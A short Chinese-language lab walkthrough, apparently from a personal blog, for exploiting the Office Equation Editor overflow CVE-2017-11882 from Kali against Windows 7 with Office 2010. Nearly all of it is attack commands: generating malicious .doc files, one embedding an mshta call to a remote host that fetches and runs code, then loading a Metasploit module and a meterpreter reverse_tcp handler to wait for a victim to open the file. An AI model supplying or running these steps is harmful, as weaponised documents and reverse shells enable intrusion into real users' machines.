CVE-2017-11882

Introduction

CVE-2017-1188 是微软公布的一个远程执行漏洞,通杀目前市面上的所有 office 版本及 Windows 操作系统。该漏洞的成因是 EQNEDT32.EXE 进程在读入包含 MathType 的 ole 数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。上次出现这么典型的 office 栈溢出漏洞是著名的 CVE-2012-0158。

  • Tool: Kali Rolling x64
  • Target Machine: Windows 7 Ultimate x64
  • Target Software: Microsoft Office 2010 Professional Plus

步骤

  1. Bash 

    unzip CVE-2017-11882.zip
python CVE-2017-11882/cve-2017-11882.py -c "cmd.exe /c calc.exe" -c "calc.doc" # test
python CVE-2017-11882/cve-2017-11882.py -c "mshta http://10.20.20.5:8080/path" -c "classTable.doc"
cp CVE-2017-11882/cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
cp CVE-2017-11882/cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/msfconsole

  2. msfconsole 

    reload_all
search CVE-2017-11882
use exploit/windows/smb/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set lhost 10.20.20.5
set uripath path
run # exploit
# wait for target to open the 'classTable.doc' documnet
# open or edit the 'calc.doc' will open calc.exe in Windows 7
# but only edit the 'calc.doc' will open calc.exe in Windows 10
# PS: Windows 10 must close Windows Defender
湘ICP备19014083号-1